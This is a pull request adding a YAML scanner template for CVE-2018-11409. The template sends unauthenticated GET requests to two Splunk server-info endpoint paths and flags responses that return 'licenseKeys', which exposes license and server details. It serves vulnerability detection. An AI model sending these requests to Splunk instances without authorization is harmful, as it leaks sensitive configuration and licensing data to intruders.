### PR TITLE
Create CVE-2018-11409.yaml

### DIFF
--- a/cves/CVE-2018-11409.yaml
+++ b/cves/CVE-2018-11409.yaml
@@ -1,0 +1,22 @@
+id: CVE-2018-11409
+
+info:
+  name: Splunk Sensitive Information Disclosure
+  author: Harsh Bothra
+  severity: medium
+
+# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
+      - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'      
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - licenseKeys


### PR DESCRIPTION
CVE-2018-11409  allows an unauthenticated user to get sensitive information such as license key from a Splunk instance by appending /__raw/services/server/info/server-info?output_mode=json to a query.